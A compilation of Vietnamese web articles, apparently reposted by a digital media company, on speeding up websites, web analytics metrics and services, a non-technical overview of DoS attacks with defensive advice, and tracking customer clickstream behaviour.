7 thủ thuật tăng tốc website

By Công Ty Truyền Thông Số iGO

Nghiên cứu thói quen sử dụng máy tính cho thấy người dùng sẽ chuyển sang trang khác nếu website không có “động tĩnh” gì sau 4 giây. Vì thế, tốc độ là yếu tố quan trọng và cũng là ưu thế cạnh tranh để cung cấp thông tin.

7 thủ thuật dưới đây sẽ tăng đáng kể website của bạn.

1. Chuyển host lưu trữ file hoặc ảnh cỡ lớn sang nơi khác:

Dịch vụ ImageShack được nhiều người làm nơi lưu trữ ảnh cho website.
Dịch vụ ImageShack được nhiều người làm nơi lưu trữ ảnh cho website.

Nhiều người cùng online một lúc có thể làm nghẽn đường truyền của bạn với hàng đống yêu cầu xem cùng một tấm hình trên website. Gánh nặng dữ liệu có thể chuyển sang những website chuyên để lưu trữ và chia sẻ ảnh như ImagaShack, Photobucket hay Flickr. Bằng cách này, máy chủ web của bạn chỉ cần đảm bảo phần text và file ảnh cỡ nhỏ, giảm đáng kể băng thông đồng nghĩa với việc phục vụ được nhiều người một lúc hơn.

Nếu muốn chia sẻ những file nhỏ, khoảng 2 – 5MB, với khách viếng thăm, bạn có thể sử dụng dịch vụ Google Pages như một máy chủ web phụ.

2. Tối ưu hóa mã CSS:

Hiện nay, nhiều website bắt đầu sử dụng CSS (Cascade Style Sheet) để định dạng. Mặc dù bảng CSS nhìn bắt mắt và hiệu quả hơn định dạng bảng HTML, nhưng nó đòi hỏi bạn phải tối ưu hóa code của chúng mới mong đạt được tốc độ tối ưu. Đoạn mã CSS “sạch” sẽ giúp trình duyệt giải mã trang web nhanh hơn.

Ví dụ: Thay vì viết:

margin-top: 20px;
margin-right: 10px;
margin-bottom: 20px;
margin-left: 10px;

Bạn nên viết:

margin: 20px 10px 20px 10px;

Theo các chuyên gia tối ưu hóa của Yahoo thì các mã CSS nên được đặt ở phần đầu của web. Điều này đặc biệt ý nghĩa nếu trang của bạn lớn và có nhiều đối tượng. Nếu bạn đặt CSS ở cuối hoặc giữa trang web, trình duyệt sẽ dùng định dạng mặc định để hiện thị, sau đó mới tái định dạng bằng CSS. Điều đó đòi hỏi thêm thời gian tính toán và tất nhiên người dùng sẽ khó chịu khi nhìn một website vỡ tung khi chưa định hình.Thậm chí, một số trình duyệt cũng cấm đặt CSS tại cuối website.

Nếu chưa thạo về code, công cụ trực tuyến nhỏ Clean CSS sẽ giúp bạn công đoạn tối ưu này, loại bỏ những khai báo thừa và khoảng trống vô nghĩa. Bạn có thể tham khảo tại đây.

3. Tối ưu hóa hình ảnh:

Sử dụng tính năng Save for Web để loại bớt những thông tin không cần thiết và tối ưu kích thước ảnh.
Sử dụng tính năng Save for Web để loại bớt những thông tin không cần thiết và tối ưu kích thước ảnh.
Có 4 loại định dạng hình ảnh sử dụng phổ biến trên web: PNG, JPG, /JPEG và GIF. Hầu hết các phần mềm xử lý ảnh như Adobe Photoshop đều có tính năng “Save for Web” để tối ưu tỉ lệ giữa chất lượng hình và kích thước file.

4. Khai báo kích thước hình ảnh:

Nhiều lập trình viên nghiệp dư “quên” khai báo tag chiều cao và rộng của ảnh khi viết mã HTML. Hai thông số này báo với trình duyệt kích thước của ảnh trước khi dữ liệu được tải về. Nếu không được khai báo trước, trình duyệt phải tự tính toán kích thước bằng cách download toàn bộ hình ảnh về, sau đó mới đến lượt các dữ liệu khác.

Khi khai báo hình ảnh có đầy đủ các tag, trình duyệt sẽ dành 1 khoảng trống vừa đúng kích thước ảnh và tiếp tục tải dữ liệu . Như vậy, người xem có thể đọc ngay phần văn bản trong khi hình ảnh vẫn tiếp tục được hiện ra từng phần.

5. Giảm thiểu sử dụng Javascript:

Các hiệu ứng hoạt hình của Java script rất bắt mắt và nhiều người có xu hướng đưa chúng vào website của mình. Tuy nhiên, sử dụng quá nhiều Javascript có thể làm trình duyệt bị treo cứng khiến người dùng bực mình. Phải cân nhắc thật kỹ lưỡng trước khi sử dụng chúng.

Vị trí đặt các đoạn mã script cũng khá quan trọng đối với tốc độ hiển thị. Lời khuyên của dân lập trình chuyên nghiệp: chỉ để những script thực sự quan trọng có ảnh hưởng toàn trang lên đầu, còn những hiệu ứng khác (hoạt hình, thống kê,…) thì cho xuống cuối trang.

Việc đưa Javascript và CSS ra liên kết bên ngoài tốt hơn là chèn thẳng vào trang web. Những file này sẽ được lưu tại bộ nhớ đệm (cache) của trình duyệt và người dùng sẽ không phải download lại chúng mỗi khi cần đến. Nó giảm đáng kể thời gian và băng thông của máy chủ cũng như người dùng.

6. Tối ưu hóa liên kết:

Chú ý mỗi đường link được đặt trên website hay blog của bạn được viết một cách ngắn gọn và chính xác. Ví dụ mỗi entry trên 360 Yahoo đều có 1 phần “Permanent Link” để lấy liên kết chính xác và gọn gàng hơn nhiều so với những gì hiển thị trên ô địa chỉ (address bar) của trình duyệt. Việc sử dụng chính xác đường link sẽ giảm bớt những yêu cầu không đáng có đối với máy chủ trong một số trường hợp.

7. Giảm bớt các yêu cầu HTTP tới máy chủ:

Khi mở website, mỗi đối tượng trên trang (hình ảnh, script, hình vẽ, đường kẻ, …) đều tạo ra 1 yêu cầu tới máy chủ để tải về. Tất nhiên, càng nhiều đối tượng thì việc tải về càng lâu hơn. Vì thế, hãy giảm thiểu số đối tượng trên cùng 1 trang và cố gắng gộp file CSS với các script lại với nhau.

(Theo VietnamNet)

 
Up?

Các phương pháp và công cụ đánh giá website

By Công Ty Truyền Thông Số iGO

Khách hàng là người quyết định - điều này cũng đúng trong thế giới web. Số lượng khách truy cập website, số trang khách xem, thời gian khách dừng chân... quyết định thứ hạng và giá trị của website.

Thế giới web ngày càng nhộn nhịp, thu hút không chỉ người dùng cá nhân mà cả doanh nghiệp. Ngày càng có nhiều công ty lập website, kinh doanh và quảng cáo trên web. Tuy theo đuổi những mục tiêu khác nhau nhưng hầu hết các công ty đều cần đo lường hiệu quả công sức và tiền của mà họ đã đầu tư trên web.

Câu nói “khách hàng luôn đúng” lại vẫn đúng! Website có nội dung hấp dẫn, sẽ có nhiều khách truy cập; nội dung website được cập nhật, khách sẽ đến thường xuyên. Những “số đo” về khách truy cập website có thể trả lời cho các câu hỏi như: “mức độ thu hút của website?”, “hiệu quả của chiến dịch tiếp thị?”, “sự trung thành của khách hàng?”, “phân khúc khách hàng quan trọng?”... những số liệu này giúp các chủ website hiểu được khách hàng của mình tốt hơn và có thể đưa ra những chiến lược thích hợp đem lại sự hài lòng cho khách hàng và lợi nhuận cho website.

Các chỉ số

Khi nói đến mức độ thu hút của website, người ta thường trưng ra số “hit” – số lượt truy cập. Không có gì lạ vì đây là chỉ số có thể gây ấn tượng nhờ trị số lớn.

Hit thường được đếm khi có một thành phần dữ liệu (file) được truy xuất từ máy chủ web (web server). Một trang web có thể gồm nhiều thành phần như CSS, JavaScript, hình,... Khi trình duyệt của người dùng mở một trang web, nó sẽ yêu cầu tất cả thành phần này từ web server, mỗi yêu cầu có thể được đếm như 1 hit. Nếu thiết kế “khéo”, một trang web có thể tạo nên hàng chục hit mỗi lần được truy cập.

Số hit thường do các website tự đếm và không có dịch vụ độc lập kiểm chứng, nó hay được nói quá lên và cũng rất dễ dùng kỹ thuật lập trình tạo ra số hit tăng phi mã. Do tình trạng lạm phát, hit đã bị mất giá và giờ đây không còn được xem là thước đo chính cho website.

Tương tự hit, số trang xem - “pageview” - cũng được đếm khi có yêu cầu truy xuất file từ web server nhưng chỉ đếm cho trang chính (file .htm, .asp, .php...), không tính các thành phần trong trang. Nhiều website hiện nay đã áp dụng cách đếm “trung thực” này tuy vẫn dùng tên “hit”, khi này số hit chính là số pageview. Số pageview có ý nghĩa không chỉ vì nó cho biết số trang “thật” được xem mà còn cho biết số quảng cáo được hiển thị cùng với trang (quảng cáo có thể được bán theo phương thức CPM – Cost Per iMpression, tính cho mỗi 1000 trang xem).
Hiện được xem là 1 trong 2 “thước do” chính của website (Hình 1), tuy nhiên chỉ số pageview có nguy cơ bị thất sủng do những kỹ thuật mới như Ajax, RSS, mashup... và sự phát triển của video trên web. Những kỹ thuật mới như Ajax đem đến cho người dùng thông tin nhanh hơn, nhiều hơn, tiện lợi hơn và ít phải nạp trang web hơn, do vậy giảm số pageview. Pageview càng bị thất thu với video - với những website như YouTube người ta có thể xem cả thước phim (có thể xen kẽ hàng chục cảnh quảng cáo) chỉ với 1 trang xem.

Hình 2. Chỉ số thời gian cho biết “sức hút” của trang đối với những đối tượng khách khác nhau.

Chỉ số thứ 2 hiện được trọng dụng là số khách truy cập (“visitor” hay “unique visitor”). Khách truy cập website được xác định dựa trên thông tin nhận dạng thường là địa chỉ IP hay dữ liệu cookie “không trùng” trong khoảng thời gian quy định (chẳng hạn 12 giờ hay 24 giờ). Trong thời gian này, mỗi khách chỉ được đếm 1 lần dù truy cập website nhiều lần (và tạo nên nhiều hit). Chỉ số này rất có ý nghĩa đối với các báo điện tử và công ty quảng cáo. Rõ ràng, nhiều người xem quan trọng hơn là chỉ một nhóm người xem đi xem lại nhiều lần.

Tuy nhiên, số đo “unique visitor” không phải lúc nào cũng phản ánh đúng số khách “không trùng” truy cập website. Hàng chục hay hàng trăm người dùng trong một mạng nội bộ (LAN) có thể giao tiếp với thế giới bên ngoài chỉ qua một địa chỉ IP (thông qua firewall hay proxy server) và do vậy chỉ được đếm như một visitor. Một số nhà cung cấp dịch vụ Internet có thể sử dụng DHCP (Dynamic Host Configuration Protocol) sinh ra địa chỉ IP khác nhau cho mỗi file được yêu cầu, trong trường hợp này thì một khách truy cập lại được đếm như nhiều visitor. Rất may là những trường hợp này không phổ biến.

Cùng với số visitor, thời gian mà khách lưu lại website cũng là số đo quan trọng, đánh giá sự quan tâm của khách (Hình 2). Dù nhắm đến mục tiêu gì thì trước hết website cần phải có được sự quan tâm của khách. Số trang xem hay số visitor dù có lớn đến mấy đi nữa cũng sẽ mất ý nghĩa khi mà khách đến rồi đi ngay, không hề dành thời gian xem nội dung và quảng cáo. (Xem phần “Click hay không click?”).

Chỉ số thời gian cùng với các chỉ số đánh giá sự tương tác của khách với website như tỉ lệ khách thực hiện giao dịch (ví dụ mua hàng trực tuyến) hay tỉ lệ khách quay lại so với khách mới... không chỉ đánh giá số lượng mà cả chất lượng khách truy cập.

Các chỉ số về chất lượng ngày càng được quan tâm. Trong môi trường Internet ngày càng cạnh tranh, người ta càng phải chú trọng vào thị trường hẹp hơn và càng cần khách chất lượng hơn có tiềm năng trở thành khách hàng thật sự (thực hiện giao dịch).

Về mặt kỹ thuật, việc đo đếm số hit, pageview, visitor hay thời gian không khó. Hầu hết các nhà phát triển web đều có thể thực hiện và đa phần các website đều có chức năng này.
Dịch vụ “kiểm toán”

Nếu chỉ nhằm mục đích sử dụng cho nội bộ công ty để đánh giá hiệu quả hoạt động của website và nắm bắt nhu cầu của người dùng để đưa ra quyết định những điều chỉnh chiến lược thì không có vấn đề gì. Tuy nhiên, những chỉ số này còn có thể được sử dụng để “báo giá” website với đối tác (ví dụ khách hàng quảng cáo), hay để “so kè” với các website cạnh tranh khác, vì thế cần đến dịch vụ “kiểm toán” độc lập để đảm bảo tính trung thực và khả năng so sánh của các chỉ số.

Dịch vụ “kiểm toán” các chỉ số của website hiện đang phát triển mạnh cùng với xu thế thương mại điện tử. Hiện có đến gần cả trăm dịch vụ đánh giá website trên thị trường, có thể một số tên tuổi lớn như Nielsen Netratings (www.nielsen-netratings.com), comScore (www.comscore.com/metrix), Ominture (www.omniture.com), WebTrends (www.webtrends.com), WebSideStory (www.websidestory.com), Coremetrics (www.coremetrics.com), Core Metrics (www.coremetrics.com), HitsLink (www.hitslink.com), Hitwise (www.hitwise.com)... Ngoài những chỉ số pageview, visitor, thời gian, các dịch vụ này còn có thể ghi nhận nhiều số liệu chi tiết về khách truy cập như họ từ đâu đến và cần tìm gì, họ dùng trình duyệt gì, độ phân giải màn hình bao nhiêu... và cung cấp những tính năng báo cáo thống kê, phân tích dữ liệu tinh vi phục vụ cho việc đánh giá số lượng và chất lượng khách truy cập, hiệu quả hoạt động của website và những chiến dịch quảng cáo tiếp thị trên web.

Những dịch vụ trên cung cấp nhiều thông tin giá trị nhưng giá cũng cao. Giải pháp đắt tiền không phải lúc nào cũng tốt, có những dịch vụ ít tốn kém hơn vẫn có thể cung cấp số liệu thống kê hữu ích cho những website cỡ vừa và nhỏ, như VisiStats (www.visistat.com), ClickTracks (www.clicktracks.com) hay NetTracker (www.sane.com), thậm chí còn có dịch vụ miễn phí nhưng đáng giá như Google Analytics (www.google.com/analytics).

Bỏ ra 30 triệu USD mua hãng Urchin để cung cấp dịch vụ miễn phí (Google cũng có dịch vụ thu phí cung cấp số liệu chi tiết hơn), Google thật sự gây khó cho các dịch vụ cạnh tranh khác nhưng được các chủ website hoan nghênh về những số liệu thống kê phong phú và giá trị, có cả chỉ số về số lượng (lượng truy cập, trang xem,...) lẫn về chất lượng (thời gian, tỉ lệ giao dịch...). Cái tên Google có thể đảm bảo cho độ tin cậy của những chỉ số này. Đây là dịch vụ đánh giá web miễn phí đáng giá nhất hiện nay (Hình 3).

google

Hình 3. Google Analytics có thể cho biết khách từ đâu đến và họ cần tìm gì.

Có một dịch vụ miễn phí khác khá được ưa chuộng đó là Alexa (www.alexa.com). Dịch vụ này đánh giá các chỉ số pageview và “reach” (tính theo số visitor) để xếp hạng website. Khác với Google Analytics có yêu cầu chèn mã lệnh vào các trang web của website cần đánh giá, Alexa thu thập dữ liệu thông qua công cụ Alexa Toolbar cài trên máy khách. Dịch vụ Alexa tiện lợi cho việc so sánh tương quan “thế lực” giữa các website với nhau, tuy nhiên chỉ có tính tham khảo vì thứ hạng Alexa không phản ánh chính xác giá trị của website. Thứ nhất, số lượng người cài Alexa Toolbar nhỏ không đủ đại diện cho cộng đồng người dùng Internet (thật sự chẳng có mấy ai cài công cụ này chỉ để biết thứ hạng của những website mà họ truy cập - mục đích chính của công cụ này). Thứ hai, thứ hạng Alexa dễ bị thao túng, đơn giản nhất là khai thác ngay chính Alexa Toolbar (nhờ nhiều người cài đặt công cụ này và truy cập website thường xuyên), tinh vi hơn thì có thể sử dụng những công cụ như Alexabooster hay Alexa Surf.

Thêm một tên tuổi lớn chuẩn bị vào cuộc sau Google. Năm rồi Microsoft đã mua hãng Deepmetrix (giá chưa được công bố) và sẽ đưa ra dịch vụ đánh giá web trong nay mai, theo nhiều nguồn tin thì dịch vụ này có tên là Gatineau và sẽ được cung cấp miễn phí (Hình 4). Đây có thể sẽ là đối thủ xứng tầm với Google Analytics. Hiện tại Microsoft có giới thiệu thử nghiệm dịch vụ AdCenter Labs (http://adlab.msn.com/DPUI/DPUI.aspx) đánh giá và dự báo về giới tính và độ tuổi của khách truy cập website. Các chỉ số này khá thú vị nhưng khó có thể nói về độ chính xác vì chỉ dựa vào dữ liệu người dùng mạng MSN mà không yêu cầu can thiệp gì đến mã lệnh của website cần đo hay cài đặt công cụ trên máy người dùng (Hình 4).

ad center

Hình 4: Microsoft AdCenter cho những số liệu thống kê thú vị về giới tính và độ tuổi của khách

Hiện còn có nhiều dịch vụ đo website miễn phí khác cũng rất tốt như StatCounter (www.statcounter.com), ClickTracks Appetizer (www.clicktracks.com/products/appetizer/), eXTReMe Tracking (extremetracking.com), SiteMeter (www.sitemeter.com), Add Free Stats (addfreestats.com), Compete (www.compete.com)... một số sử dụng cách thức chèn mã như Google Analytics (trong số này, khác với Google Analytics, một số dịch vụ không được ẩn mà buộc phải hiển thị “nhãn hiệu” của dịch vụ trên các trang web cần đánh giá), một số thu thập dữ liệu qua công cụ cài trên máy khách như Alexa, cũng có dịch vụ lấy thông tin kết hợp từ nhiều nguồn (như Compete, đối thủ của Alexa, thu thập thông tin qua công cụ cài trên máy khách kết hợp với thông tin lấy từ các ISP).

Ngoài ra, hiện cũng có một số dịch vụ đánh giá blog miễn phí như FeedBurner (www.feedburner.com, cho phép đánh giá cả RSS và Podcast) (Hình 4), Measure Map (www.measuremap.com, thuộc Google), IceRocket (tracker.icerocket.com, có xếp hạng blog)... Blog là một dạng website đặc biệt, cần có những chỉ số đặc biệt như số bài gửi lên blog (post) hay số bài bình (comment).

feed burner

Hình 5. FeedBurner có thể đánh giá blog, RSS và Podcast.

Mọi người đều biết nội dung hấp dẫn và giao diện bố cục hợp lý, dễ dùng là những yếu tố quan trọng tạo nên sự thành công của một website. Nhưng dù website có thiết kế tốt đến mấy đi nữa mà không được lòng khách hàng thì cũng vô nghĩa.

Tuy nhiên không hẳn các chỉ số về khách hàng cao đều tốt và ngược lại, điều này còn tuỳ mô hình kinh doanh của website. Ví dụ, chỉ số pageview cao tốt cho website báo trực tuyến vì nó có nghĩa nhiều bài được xem (và có thể thu hút nhiều quảng cáo), nhưng với website hỗ trợ khách hàng thì lại không tốt vì nó có nghĩa khách hàng gặp nhiều trục trặc (với sản phẩm của công ty) và cần hỗ trợ. Hay với dịch vụ tìm kiếm Google, chỉ số thời gian thấp vì Google cung cấp nhanh thông tin khách cần tìm, chỉ số pageview của mỗi khách cũng không cao vì Google có cơ chế xếp hạng để đưa ra những kết quả tìm kiếm thích hợp nhất ngay trang đầu, điều này tốt cho cả Google và người dùng (nhờ vậy Google có lượng khách truy cập thường xuyên đông).

Tùy mô hình kinh doanh, mỗi website có thể cần những chỉ số khác nhau. Và chỉ số chính là chỉ số cho thông tin mà chủ website cần hay “có lợi” (thường được công bố) giúp đánh bóng tên tuổi website. Việc kiểm toán chỉ số cũng tùy: tùy qui mô và lưu lượng của website, và tùy số tiền mà chủ wesbite muốn chi. Để “chứng thực” thế lực của mình, các website lớn có lượng khách truy cập hàng ngày từ hàng triệu trở lên có thể phải cần đến những dịch vụ kiểm toán tên tuổi và có phí. Tuy nhiên đôi khi giải pháp miễn phí (như Google Analytics) cũng có thể cung cấp những số liệu giá trị về website.

Cần đánh giá chỉ số nào và sử dụng dịch vụ kiểm toán nào thì tuỳ, nhưng có một điều chắc chắn đó là website cần được đánh giá.

CLICK HAY KHÔNG CLICK?

Click (nhấn chuột) - một hình thái khác của hit - cũng là một chỉ số quan trọng của website, cho biết hiệu quả của quảng cáo trên web. Số click cao được hiểu là có nhiều người quan tâm - thể hiện bằng việc “click” hay nhấn lên banner hay logo quảng cáo (và làm tăng số click). Và phương thức tính click thu phí (Pay Per Click - PPC hay Cost Per Click - CPC) hiện rất được ưa chuộng. Giống như hit, click cũng bị tình trạng “ảo”. chỉ số này có thể được ngân lên hay được “bơm” dùng chương trình sinh click tự động (được biết đến với tên gọi “clickbot”). Để tránh tình trạng này, click thường được ghi nhận cùng với thông tin nhận dạng (như địa chỉ IP, cookie). Nhưng giải pháp này không triệt để vì vẫn có thể bị “qua mặt”: dùng công cụ tạo địa chỉ IP ảo. Để đối phó, lại phát sinh thêm các dịch vụ kiểm tra click ảo như Click Auditor (http://www.keywordmax.com/click_auditor.html),Vericlix (http://www.vericlix.com)... nhưng trận chiến “click” chưa kết thúc. Các công ty quảng cáo trên web còn phải đau đầu với tình trạng “đọc thuê”, phương thức này đơn giản nhưng khó bị phát hiện: số lượng lớn người dùng ở rải rác khắp nơi được thuê thường xuyên nhận email quảng cáo và truy cập website khách hàng quảng cáo (số tiền thuê nhỏ hơn nhiều so với số tiền chủ website nhận được từ khách hàng quảng cáo). Những người này không hề quan tâm đến nội dung trang web hay quảng cáo, họ chỉ đơn giản nhấn chuột, đến trang web rồi đi ngay. Vấn đề chính đối với click đó là yêu cầu... click! Phương thức tính click vừa làm mất thời gian của người xem (phải nhấn và đợi nạp trang web khác) vừa dễ bị “thất thu” nếu thông tin quảng cáo không “mời gọi” hay trang web của khách hàng quảng cáo không được cập nhật. Thật ra có nhiều hình thức quảng cáo không cần phải click (quảng cáo cung cấp đủ thông tin cho người xem, như quảng cáo trên TV hay báo in). Với những quảng cáo như vậy, người ta có thể sử dụng phương thức tính trang xem - PPV (Pay Per View - PPV hay Cost Per 1000 iMpression - CPM), hay lần giao dịch - CPA (Cost Per Action hay PPA - Pay Per Action).

Nguồn tin: Thế Giới Vi Tính




 
Up?

Ba con đường dẫn đến trang web của bạn bị tấn công

By Công Ty Truyền Thông Số iGO

Ngay sau khi kết nối và hoà vào mạng Internet, không chỉ máy chủ lưu giữ website, mà toàn bộ mạng lưới máy tính của bạn rất có thể sẽ trở thành mục tiêu của những cuộc tấn công có chủ ý từ phía các hacker - hay "những tên tội phạm máy tính".

Không chỉ đối với các website thương mại điện tử nhỏ không có các chương trình để duy trì và bảo vệ sự an toàn cần thiết, mà ngay cả những công ty lớn có tên tuổi như Yahoo! Inc, eBay Inc, Amazon.com Inc, Buy.com Inc, CNN.com, E*Trade Group Inc…, và thậm chí đã được cảnh báo trước, cũng khó có thể tránh khỏi những cuộc tấn công và những hậu quả mà những cuộc tấn công đó gây ra như: ngừng hoạt động website, thao túng và phá huỷ các mã chương trình, máy tính của bạn sẽ trở nên kém tính năng, và thậm chí là hàng triệu đô la trong tài khoản của bạn cũng bị lấy trộm.

Bản tin Thương mại Điện tử sẽ giúp bạn tìm hiểu về những cuộc tấn công trên cùng những giải pháp phòng ngừa và khắc phục:

w Cuộc tấn công DoS (Denial of Service): Những cuộc tấn công trên hệ thống Internet.

w Vi rút (Virus): Những cuộc tấn công vào hệ thống mạng nội bộ.

w Ăn trộm thẻ tín dụng (Credit Card Theft): Những cuộc tấn công về cơ sở dữ liệu.

Phần 1 - Cuộc tấn công DoS

Những cuộc tấn công dữ dội đã từng làm giảm giá trị của các website lớn như Yahoo! Inc, eBay Inc, CNN.com và Buy.com Inc được gây ra bởi một cuộc tấn công được gọi là cuộc tấn công DoS - có thể hiểu là "sự phủ nhận dịch vụ". Đây là một trong những hình thức tấn công dễ thực hiện nhất, và là một trong những hình thức tấn công khó tránh và khắc phục nhất. Nó có thể phá huỷ và làm hỏng hệ thống máy của bạn trong hàng giờ đồng hồ.

Về mặt kỹ thuật, những cuộc tấn công DoS có thể được coi là không nguy hại nhiều. Tuy nhiên về mặt tài chính, bạn sẽ bị thiệt hại những khoản doanh thu lớn trong suốt thời gian mà trang web của bạn không hoạt động được.

1. Khái niệm:

Cuộc tấn công DoS là hiện tượng một luồng thông tin được gửi liên tục đến một mục tiêu với ý định làm tràn dữ liệu cho đến khi không có khả năng tải một cách hợp pháp.

Mục tiêu của những cuộc tấn công này là nhằm vào máy chủ web của bạn, thông qua việc phủ nhận khả năng tải thông tin từ hệ thống của bạn. Nhưng, không giống như phần lớn những cuộc tấn công khác, cuộc tấn công DoS không đòi hỏi những hacker phải truy cập bằng được vào các máy chủ mục tiêu. Thay vì vậy, người thực hiện cuộc tấn công này có thể truy cập vào trong những máy tính khác của hệ thống, cài mã chương trình để biến chúng trở thành những "kẻ tòng phạm". Những kẻ tòng phạm này sau đó sẽ gửi hàng loạt những yêu cầu về thông tin đến mục tiêu chính của cuộc tấn công.

Việc gửi hàng loạt những yêu cầu về thông tin từ các máy tính trên sẽ nhanh chóng làm máy chủ mục tiêu trở nên quá tải. Và hậu quả thứ nhất của cuộc tấn công này là tất cả máy chủ sẽ buộc phải tập trung vào để trả lời những yêu cầu thông tin được gửi đến, sẽ không có thời gian để bảo vệ và quan tâm đến các trang web. Và tất yếu hậu quả thứ hai sẽ là: website của bạn sẽ ngừng hoạt động.

2. Cách nhận biết:

Có một cách rất đơn giản để nhận biết ra loại tấn công này. Sẽ không phải bạn và tất nhiên cũng không phải bất kỳ một người nào có khả năng truy cập vào website của bạn. Bạn cần phải có một đội ngũ nhân viên với tư cách là người quản trị mạng - tường tận về tất cả các nội dung của website. Đội ngũ đó hoàn toàn có khả năng phát hiện ra những dấu hiệu của cuộc tấn công như: khối lượng các yêu cầu gửi qua mạng tăng, thời gian truy cập vào website lâu hơn, thời gian thực hiện của hệ thống trả lời chậm lại…

3. Ai là kẻ "chủ mưu" và động cơ thực hiện cuộc tấn công?

Dường như không có một "phần thưởng đáng giá" nào dành cho những kẻ thực hiện cuộc tấn công DoS này. Hoàn toàn không vì mục đích lợi nhuận, động cơ chính của những kẻ "chủ mưu" khi thực hiện cuộc tấn công này là nhằm phô trương tài năng và thử nghiệm những chương trình mà họ nghĩ ra. Các chuyên gia máy tính thường nhìn nhận họ như là những người không có đầu óc và thực sự không sáng tạo. Nhưng đối với các hacker thực hiện âm mưu này, ý định tấn công vào những công ty trực tuyến lớn nhất là một kỳ tích tuyệt vời. Họ có thể tự hào tuyên bố: "Tôi đã hạ bệ được Yahoo!." và làm cho các website nhỏ ngừng hoạt động .

4. Cách tự bảo vệ:

Bạn có thể trở thành "nạn nhân" của cuộc tấn công DoS theo hai con đường: Hoặc bạn là mục tiêu chính của cuộc tấn công hoặc bạn sẽ trở thành "kẻ tòng phạm" không chủ tâm của vụ tấn công.

Để giảm thiểu các rủi ro của cuộc tấn công DoS, bạn có thể tham khảo các giải pháp sau:

w Chuyển dịch vụ web hosting của bạn sang một nhà cung cấp lớn và có uy tín hơn. Họ sẽ có các chương trình để tránh, phát hiện và khắc phục hậu quả của các cuộc tấn công DoS. Và có trách nhiệm trong việc phòng ngừa tấn công cũng như việc đảm bảo website của bạn luôn hoạt động.

Để hiểu thêm thế nào là một dịch vụ web hosting hoàn hảo và bảo mật các bạn có thể tra cứu tại địa chỉ: http://www.thuongmaidientu.com/ecommerce/hosting.html

http://thuongmaidientu.com/bantin/issue45.html

w Quan tâm hơn đến việc đầu tư nâng cấp các phần cứng, nếu bạn thuê máy chủ cho trang web riêng của bạn. Bởi vì, khi khối lượng thông tin mà bạn có thể xử lý càng lớn thì khả năng tấn công làm tràn thông tin trên máy chủ của bạn sẽ càng khó đối với các hacker. Vì vậy, giải pháp đơn giản nhất là: xây dựng nhiều phần cứng với những tính năng kỹ thuật cao để khắc phục những sự cố về dữ liệu. Tuy nhiên, nếu công ty của bạn là các công ty nhỏ, đây có thể không phải là một sự lựa chọn tối ưu.

Các công ty có hệ thống lớn hơn, có thể gia nhập vào cầu dẫn của mạng cục bộ trong cấu trúc máy chủ của họ. Cầu dẫn sẽ có chức năng lưu trữ và chuyển tiếp các bức thư điện tử trong mạng máy tính, đầu tiên nó sẽ xác định tất cả các đường dẫn đến địa chỉ nhận và sau đó lựa chọn đường dẫn thích hợp nhất. Một số các cầu dẫn trên thị trường hiện nay còn có những đặc điểm cho phép bạn hạn chế lượng thông tin tải về. Hơn nữa, khi bạn đã vô tình trở thành nạn nhân của loại tấn công này, các cầu dẫn sẽ giúp bạn phục hồi lại nhanh hơn.

w Chuẩn bị một kế hoạch hỗ trợ để cập nhật lượng thông tin tải đến các địa chỉ web. Khi nhận ra được nguy cơ sẽ trở thành nạn nhân của cuộc tấn công DoS, đó cũng là lúc bạn phải thay đổi khả năng tải hợp lý hơn. Cuộc tấn công DoS là riêng đối với địa chỉ web của bạn, nhưng bạn có thể chuyển tiếp những thông tin đề nghị hợp lý của bạn đến những máy chủ khác trong khi đang bị tấn công. Những kẻ chủ mưu thực hiện cuộc tấn công này sẽ không biết điều đó.

(Theo ThuongMaiDienTu)

 
Up?

Bạn biết khách hàng đang làm gì trên website của mình không?

By Công Ty Truyền Thông Số iGO

Bạn có biết ai là khách hàng tuyệt vời nhất của bạn không? Bạn có biết họ mua bao nhiêu hàng hoá và mua khi nào không? Bạn có biết họ sử dụng Website của bạn ra sao không?

Một vài năm trở về trước, có một tổ chức đã sắp xếp thứ tự các Website của tất cả các hãng hàng không từ tốt nhất đến tồi nhất. Website được xếp ở vị trí tốt nhất làm rất nhiều thứ bởi nó là một trong số ít các website thực sự có thông tin về chuyến bay và giá vé trên chính trang chủ.

Nhiều website khác có trang chủ trông rất đẹp. Nhưng để lấy được thông tin cần thiết thì khách viếng thăm phải dành thêm nhiều thời gian hơn nữa trên trang chủ đó. Điều đó thực sự là không “đẹp”. Người ta phải mất thêm nhiều thời gian mới có được thông tin mong muốn.

Bạn có biết những khách hàng tuyệt vời nhất của bạn dùng website của bạn như thế nào không? Những phần nào của website cần được đưa lên trang chủ? Các câu trả lời có thích hợp với từng câu hỏi khác nhau không? Site của bạn có khác với mỗi khách hàng không?

Câu trả lời cho câu hỏi “Khách hàng tốt nhất của bạn dùng website của bạn như thế nào?” có liên quan không chỉ đến thiết kế của website mà còn đến sản phẩm mà bạn cung cấp và các chiến lược marketing tổng thể.

Chi tiết câu trả lời cho câu hỏi trên quá là phức tạp nên không thể trả lời đầy đủ trong một bài viết ngắn. Có một giải pháp là tổ chức các cuộc thảo luận giữa các nhóm marketing và nhóm bán hàng, các nhóm lưu giữ dữ liệu , các nhà phân tích dữ liệu và nhóm quản trị mạng.

Nhóm marketing bắt buộc phải xác định rõ được ai là khách hàng tốt nhất. Thông thường là họ lại không biết. Nhóm lưu giữ dữ liệu sẽ cung cấp các dữ liệu giúp đưa ra chính xác định nghĩa cho đối tượng này, rồi nhóm quản trị mạng sẽ có cách để lần theo thái độ của những khách hàng này.

Phương pháp theo dõi buộc phải có một trình nhận diện. Đó là sự kết hợp của số nhận diện người sử dụng, số ID cookie hoặc địa chỉ IP. Trình nhận diện này sẽ lần theo các thông tin thăm viếng trang web của khách hàng và người ta gọi đó là dữ liệu đường dẫn (path data hoặc clickstream).

Dữ liệu đường dẫn được viết vào tệp tin sổ ghi của website thô và vào một bảng cơ sở dữ liệu đặc biệt để phát triển trình theo dõi thái độ của khách hàng với website. Các nhà phân tích, với các phần mềm khác nhau, sẽ phân tích dữ liệu.

Phần mềm của công ty ClickTracks, sản phẩm đã giành giải thưởng xuất sắc của ClickZ năm 2003, đã làm một công việc tuyệt vời là cho phép các nhà tiếp thị trích dẫn các thông tin hữu ích từ dữ liệu của họ.

